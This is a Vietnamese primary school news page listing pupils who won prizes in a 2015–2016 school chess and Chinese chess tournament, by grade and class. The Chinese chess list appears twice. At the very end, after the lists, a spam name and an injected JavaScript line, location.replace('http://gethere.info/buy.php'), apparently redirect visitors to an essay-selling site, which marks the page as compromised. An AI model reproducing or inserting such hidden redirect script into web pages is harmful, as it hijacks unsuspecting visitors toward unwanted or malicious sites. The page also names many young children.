Tổng kết giải cờ vua – cờ tướng cấp trường

05/01/2016 9:52 Sáng Phản hồi đã bị khóa

Với mong muốn tạo sân chơi và cơ hội cho các bạn nhỏ yêu thích bộ môn cờ vua, cờ tướng có cơ hội được trải nghiệm và tỏa sáng, trường tiểu học Quan Hoa đã tổ chức thành công cuộc thi cờ vua, cờ tướng cấp trường, thu hút sự tham gia đông đảo của học sinh ở nhiều độ tuổi trải đều từ lớp 1 đến lớp 5. Cuộc thi không chỉ cổ vũ cho phong trào rèn luyện thân thể, nâng cao trí tuệ mà còn góp phần phát hiện, ươm mầm những học sinh có tố chất để tiếp tục tham dự các giải thi đấu do quận và thành phố phát động.

DANH SÁCH HỌC SINH

Đạt giải cờ vua cấp trường năm học 2015 – 2016

Khối

Nam

Nữ

1

- Giải nhất: Công Thành Vinh – 1D

- Giải nhì: Nguyễn Đức Hiếu – 1B

- Giải ba: Nguyễn Vĩnh Thái – 1C

Quách Tiến Minh – 1C

- Giải nhất:

- Giải nhì:

- Giải ba:

2

- Giải nhất: Bùi Quốc Việt – 2B

- Giải nhì: Vũ Nguyên Lâm – 2B

- Giải ba: Ngô Tuấn Phong – 2B

Chu Hoàng Minh – 2B

- Giải nhất: Hoàng Hiền Anh – 2C

- Giải nhì:

- Giải ba:

3

- Giải nhất: Lê Nhật Minh – 3E

- Giải nhì: Đào Đình Khánh – 3D

- Giải ba: Nguyễn Khánh Toàn – 3A

- Giải nhất: Vũ Phương Diệp Anh – 3D

- Giải nhì: Nguyễn Công Thuỳ Chi – 3D

- Giải ba: Đặng Lâm Anh – 3D

4

- Giải nhất: Nguyễn Quang Anh – 4A

- Giải nhì: Nguyễn Quốc Thắng – 4A

- Giải ba: Đặng Huy Bách – 4D

- Giải nhất: Nguyễn Khánh Vy – 4A

- Giải nhì: Đặng Ngọc Châu – 4A

- Giải ba: Nguyễn Bảo Ngọc – 4A

5

- Giải nhất: Đàm Thành Trung – 5A

- Giải nhì: Nguyễn Huy Khôi – 5C

- Giải ba: Phạm Hoàng Anh – 5C

- Giải nhất: Nguyễn Hương Giang – 5D

- Giải nhì: Nguyễn Phương Dung – 5D

- Giải ba: Trần Ngọc Thảo Vy – 5D

DANH SÁCH HỌC SINH

Đạt giải cờ tướng cấp trường năm học 2015 – 2016

Khối

Nam

Nữ

1

- Giải nhất: Công Thành Vinh – 1D

- Giải nhì: Nguyễn Bảo Lâm – 1D

- Giải ba: Nguyễn Vi Vĩnh Cát – 1D

- Giải nhất: Trịnh Bảo Châu – 1D

- Giải nhì: Trịnh Kim Phượng – 1C

- Giải ba: Ng Chu Phương Anh – 1D

2

- Giải nhất: Ngô Tuấn Phong – 2B

- Giải nhì: Đào Minh Hiếu – 2B

- Giải ba: Phạm Tuấn Nam – 2D

- Giải nhất: Đinh Tuệ Anh – 2D

- Giải nhì: Ng Hoàng Châu Anh – 2B

- Giải ba: Phạm Khánh Linh – 2A

3

- Giải nhất: Đào Đinh Khánh – 3D

- Giải nhì: Đào Chí Nghĩa – 3D

- Giải ba: Trương Quang Minh – 3E

- Giải nhất: Vũ Phương Diệp Anh – 3D

- Giải nhì: Đặng Lâm Anh – 3D

- Giải ba: Nguyễn Vũ Ngọc Bích – 3D

4

- Giải nhất: Nguyễn Tiến Huy – 4D

- Giải nhì: Đặng Xuân Bách – 4D

- Giải ba: Vũ Tuấn Anh – 4A

5

- Giải nhất: Nguyễn Khánh An – 5B

- Giải nhì: Nguyễn Huy Khôi – 5C

- Giải ba: Đặng Trần Anh Đức – 5D

- Giải nhất: Ng Phương Nguyên – 5A

- Giải nhì: Nguyễn Diệu Hương – 5B

- Giải ba: Đào Hà Chi – 5C

DANH SÁCH HỌC SINH

Đạt giải cờ tướng cấp trường năm học 2015 – 2016

Khối

Nam

Nữ

1

- Giải nhất: Công Thành Vinh – 1D

- Giải nhì: Nguyễn Bảo Lâm – 1D

- Giải ba: Nguyễn Vi Vĩnh Cát – 1D

- Giải nhất: Trịnh Bảo Châu – 1D

- Giải nhì: Trịnh Kim Phượng – 1C

- Giải ba: Ng Chu Phương Anh – 1D

2

- Giải nhất: Ngô Tuấn Phong – 2B

- Giải nhì: Đào Minh Hiếu – 2B

- Giải ba: Phạm Tuấn Nam – 2D

- Giải nhất: Đinh Tuệ Anh – 2D

- Giải nhì: Ng Hoàng Châu Anh – 2B

- Giải ba: Phạm Khánh Linh – 2A

3

- Giải nhất: Đào Đinh Khánh – 3D

- Giải nhì: Đào Chí Nghĩa – 3D

- Giải ba: Trương Quang Minh – 3E

- Giải nhất: Vũ Phương Diệp Anh – 3D

- Giải nhì: Đặng Lâm Anh – 3D

- Giải ba: Nguyễn Vũ Ngọc Bích – 3D

4

- Giải nhất: Nguyễn Tiến Huy – 4D

- Giải nhì: Đặng Xuân Bách – 4D

- Giải ba: Vũ Tuấn Anh – 4A

5

- Giải nhất: Nguyễn Khánh An – 5B

- Giải nhì: Nguyễn Huy Khôi – 5C

- Giải ba: Đặng Trần Anh Đức – 5D

- Giải nhất: Ng Phương Nguyên – 5A

- Giải nhì: Nguyễn Diệu Hương – 5B

- Giải ba: Đào Hà Chi – 5C

.

.

BuyWritingEsse.com

location.replace(“http://gethere.info/buy.php”);

Các phản hồi đã bị đóng lại bở quản trị.